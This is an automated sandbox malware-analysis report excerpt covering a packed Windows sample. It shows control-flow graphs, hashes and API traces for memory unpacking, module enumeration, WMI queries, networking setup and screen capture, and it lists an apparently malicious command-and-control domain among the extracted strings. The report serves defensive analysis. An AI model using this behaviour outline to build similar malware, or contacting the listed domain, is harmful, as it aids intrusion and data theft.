                                                                        • Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 615 421e70-421e82 616 421e88-421edb 615->616 617 42214f-422151 615->617 618 421ee0-421f2d 616->618 619 422370-42237c 617->619 618->618 620 421f2f-421f62 call 43fb40 618->620 623 421f70-421fb4 620->623 623->623 624 421fb6-421fff 623->624 625 422000-42202c 624->625 625->625 626 42202e-422078 625->626 627 422080-4220a6 626->627 627->627 628 4220a8-4220e9 call 441c40 627->628 631 4220ec-4220ee 628->631 631->617 632 4220f0-422104 631->632 634 422156-422158 632->634 635 422106-42210b 632->635 637 422367-42236c 634->637 636 422110-422119 635->636 636->636 638 42211b-42212a 636->638 637->619 639 422130-422139 638->639 639->639 640 42213b-422146 639->640 641 422148-42214d 640->641 642 42215d 640->642 643 42215f-422170 call 408160 641->643 642->643 646 422192-4221a6 643->646 647 422172-422177 643->647 649 4221b0-4221ce 646->649 648 422180-422190 647->648 648->646 648->648 649->649 650 4221d0-4221e9 649->650 651 422204 650->651 652 4221eb-4221ee 650->652 654 422206-42221b 651->654 653 4221f0-422200 652->653 653->653 655 422202 653->655 657 42227f-422281 654->657 658 42221d-42222c 654->658 655->654 659 422354-422364 call 408170 657->659 658->657 661 42222e-42224d 658->661 659->637 661->657 666 42224f-42225f 661->666 667 422260-422269 666->667 667->667 668 42226b-422276 667->668 669 422286 668->669 670 422278-42227d 668->670 671 422288-422299 call 408160 669->671 670->671 674 4222b1-4222c2 671->674 675 42229b-42229e 671->675 676 4222d0-4222ee 674->676 677 4222a0-4222af 675->677 676->676 678 4222f0-422309 676->678 677->674 677->677 679 422322-422351 call 4215c0 call 408170 678->679 680 42230b-42230f 678->680 679->659 681 422310-422320 680->681 681->679 681->681
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ijkdefgau`c$au`c$defgau`c
                                                                        • API String ID: 0-3415814675
                                                                        • Opcode ID: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
                                                                        • Instruction ID: e077c08026441789f2384525beb931856e433a8fb10ce9bf48ff95afe867dbef
                                                                        • Opcode Fuzzy Hash: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
                                                                        • Instruction Fuzzy Hash: E8D10FB16083509FC714DF28C891B6BBBE1EFC5318F18892DE9858B391E7B9D805CB56

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 687 6aaf5e-6aaf77 688 6aaf79-6aaf7b 687->688 689 6aaf7d 688->689 690 6aaf82-6aaf8e CreateToolhelp32Snapshot 688->690 689->690 691 6aaf9e-6aafab Module32First 690->691 692 6aaf90-6aaf96 690->692 693 6aafad-6aafae call 6aac1d 691->693 694 6aafb4-6aafbc 691->694 692->691 697 6aaf98-6aaf9c 692->697 698 6aafb3 693->698 697->688 697->691 698->694
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006AAF86
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 006AAFA6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6aa000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 44fd2278450d32040d7e95693d220271910dedb56c272edd240866ca08a12ef4
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: D0F0C2312003106FD7203AF9998CBAEB2E9AF4A325F10022AE642911C0CB70EC45CE62

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 750 40aa32-40aa35 751 40aa82 750->751 752 40aa37-40aa5f 750->752 753 40aa60-40aa72 752->753 753->753 754 40aa74-40aa7b 753->754 757 40aa00-40aa12 754->757 757->757 758 40aa14-40aa2e 757->758
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MO$MO
                                                                        • API String ID: 0-3148518880
                                                                        • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                        • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                        • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                        • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                        Strings
                                                                        • 6D135015ECAF0672D0632DF0E28DC412, xrefs: 0040D16B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6D135015ECAF0672D0632DF0E28DC412
                                                                        • API String ID: 0-2874345145
                                                                        • Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                        • Instruction ID: 6f13f5d4f3e8c77ab841d9a888d2aead65439f765ee3ddc41d93c1b162d9100a
                                                                        • Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                        • Instruction Fuzzy Hash: 5B516A726057008FD329CF38CC92B577BA3AFD6314B1D866DC4964B796EB39A406C744

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 492 213003c-2130047 493 2130049 492->493 494 213004c-2130263 call 2130a3f call 2130e0f call 2130d90 VirtualAlloc 492->494 493->494 509 2130265-2130289 call 2130a69 494->509 510 213028b-2130292 494->510 514 21302ce-21303c2 VirtualProtect call 2130cce call 2130ce7 509->514 512 21302a1-21302b0 510->512 513 21302b2-21302cc 512->513 512->514 513->512 521 21303d1-21303e0 514->521 522 21303e2-2130437 call 2130ce7 521->522 523 2130439-21304b8 VirtualFree 521->523 522->521 525 21305f4-21305fe 523->525 526 21304be-21304cd 523->526 529 2130604-213060d 525->529 530 213077f-2130789 525->530 528 21304d3-21304dd 526->528 528->525 535 21304e3-2130505 LoadLibraryA 528->535 529->530 531 2130613-2130637 529->531 533 21307a6-21307b0 530->533 534 213078b-21307a3 530->534 536 213063e-2130648 531->536 537 21307b6-21307cb 533->537 538 213086e-21308be LoadLibraryA 533->538 534->533 539 2130517-2130520 535->539 540 2130507-2130515 535->540 536->530 543 213064e-213065a 536->543 541 21307d2-21307d5 537->541 548 21308c7-21308f9 538->548 542 2130526-2130547 539->542 540->542 544 21307d7-21307e0 541->544 545 2130824-2130833 541->545 546 213054d-2130550 542->546 543->530 547 2130660-213066a 543->547 549 21307e2 544->549 550 21307e4-2130822 544->550 554 2130839-213083c 545->554 551 21305e0-21305ef 546->551 552 2130556-213056b 546->552 553 213067a-2130689 547->553 555 2130902-213091d 548->555 556 21308fb-2130901 548->556 549->545 550->541 551->528 557 213056f-213057a 552->557 558 213056d 552->558 559 2130750-213077a 553->559 560 213068f-21306b2 553->560 554->538 561 213083e-2130847 554->561 556->555 563 213059b-21305bb 557->563 564 213057c-2130599 557->564 558->551 559->536 565 21306b4-21306ed 560->565 566 21306ef-21306fc 560->566 567 213084b-213086c 561->567 568 2130849 561->568 575 21305bd-21305db 563->575 564->575 565->566 569 213074b 566->569 570 21306fe-2130748 566->570 567->554 568->538 569->553 570->569 575->546
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0213024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 4d62c31e7b113053c7fec1a81403a43082a4b2b429e0d1c2d19d79fb67bed87b
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 9F527975A01229DFDB65CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA85CF14

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 686 40e3d3-40e540 CoInitializeEx * 2
                                                                        APIs
                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                        • Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
                                                                        • Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                        • Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 700 2130e0f-2130e24 SetErrorMode * 2 701 2130e26 700->701 702 2130e2b-2130e2c 700->702 701->702
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02130223,?,?), ref: 02130E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02130223,?,?), ref: 02130E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 141337286ceb6be3880347a732b0624d5417ee66cd2ec71782f629bcf62dde42
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 7DD0123124512877D7013A94DC09BCD7B5CDF09B66F108021FB0DD9080C770954046E5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 760 40df92-40dfdb CoInitializeSecurity
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID:
                                                                        • API String ID: 640775948-0
                                                                        • Opcode ID: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
                                                                        • Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
                                                                        • Opcode Fuzzy Hash: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
                                                                        • Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 792 40ab12-40ab5b call 441c40 * 2 WSAStartup
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                        • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                        • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                        • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                        • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                        • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                        • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 004404BF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: ForegroundWindow
                                                                        • String ID:
                                                                        • API String ID: 2020703349-0
                                                                        • Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                        • Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
                                                                        • Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                        • Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                        • Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
                                                                        • Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                        • Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006AAC6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6aa000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: 654d66beeef3c0fd6fc42f7114874e6979c4109110784aad5d27aa3cfd680a7a
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 1F113C79A00208EFDB01DF98C985E98BBF6AF08750F058095F9489B362D371EE50DF91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &$&$($-$/$0$0$1$1$2$4$6D135015ECAF0672D0632DF0E28DC412$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$skidjazzyric.click$t$v$x$x$z$|$}$~
                                                                        • API String ID: 0-3084380803
                                                                        • Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                        • Instruction ID: 27bd2a0d4c2ee2dbe7fab43400867feab0dee6ac78a78b22b0fd1ff9dbe20428
                                                                        • Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                        • Instruction Fuzzy Hash: 45026021D087D989DB22C67C8C483CDBFA11B63324F4843EDD5E86B3D6D6B90946CB66
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &$&$($-$/$0$0$1$1$2$4$6D135015ECAF0672D0632DF0E28DC412$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$skidjazzyric.click$t$v$x$x$z$|$}$~
                                                                        • API String ID: 0-3084380803
                                                                        • Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                        • Instruction ID: 7049a9622203a9b96d0941dc6cb55301c1ff2ff5a64c8bd667cd979f8b899d5f
                                                                        • Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                        • Instruction Fuzzy Hash: 5B026F21D087D989DB22C6BC8C483CDBFA11B63224F1883DDD4E86B3D6D7B90546CB62
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
                                                                        • API String ID: 0-1785674967
                                                                        • Opcode ID: 5c6dbee6ecf3bd3c3c628f116cafe9bcc0538f1137003045660c0d61d6d29134
                                                                        • Instruction ID: 5a335782380f72e06434a0b7d1c84293c6c1cbd051fad8399b30b8532d7f13f9
                                                                        • Opcode Fuzzy Hash: 5c6dbee6ecf3bd3c3c628f116cafe9bcc0538f1137003045660c0d61d6d29134
                                                                        • Instruction Fuzzy Hash: 0EF170319086E98ADB22C63C8C443DDBFB15B56324F0847D9D0A96B3D2C7794F86CB66
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
                                                                        • API String ID: 0-1785674967
                                                                        • Opcode ID: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
                                                                        • Instruction ID: 19a7db1aaa9dbb9bfc9e6820904345c4cfe86f3aa11d5eebc88bd9d2e45fbed0
                                                                        • Opcode Fuzzy Hash: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
                                                                        • Instruction Fuzzy Hash: B4F171319086E98ADB32CA3C8C483DDBFA25F52324F0847D9D0A96B3D2C7754B85CB61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
                                                                        • API String ID: 0-3597792095
                                                                        • Opcode ID: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
                                                                        • Instruction ID: be7a992d2d4842197a1748c1c2319ac7c28ec811ade833faf29c06d267706092
                                                                        • Opcode Fuzzy Hash: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
                                                                        • Instruction Fuzzy Hash: E8224F219087EA89DB32C67C8C483CDBFA15B67224F1843D9D4F86B3D6C7750A46CB66
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
                                                                        • API String ID: 0-3597792095
                                                                        • Opcode ID: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
                                                                        • Instruction ID: 708774573f2be2c85ddfbbb824a319d89cf762e0dc21d890c972bd4e43369a41
                                                                        • Opcode Fuzzy Hash: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
                                                                        • Instruction Fuzzy Hash: F4225D219087EA89DB32C67C8C483DDBEA15B67224F1843D9D4F87B3D2C7750A46CB66
                                                                        APIs
                                                                        • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0216BF33
                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0216BFAD
                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0216BFEB
                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0216C050
                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0216C137
                                                                        • VariantInit.OLEAUT32(?), ref: 0216C1A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                        • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                        • API String ID: 65563702-2807872674
                                                                        • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                        • Instruction ID: 74cc076390ab0d0aa6ac771a21c249616cf5fdc17dbd59343eb637cf597d38c8
                                                                        • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                        • Instruction Fuzzy Hash: 6352E0726483408BD724CF28C8997AFBBE1EF85314F188A2DE5D597391D774D806CB92
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00436989
                                                                        • GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                        • GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                        • DeleteObject.GDI32(00000000), ref: 004369C1
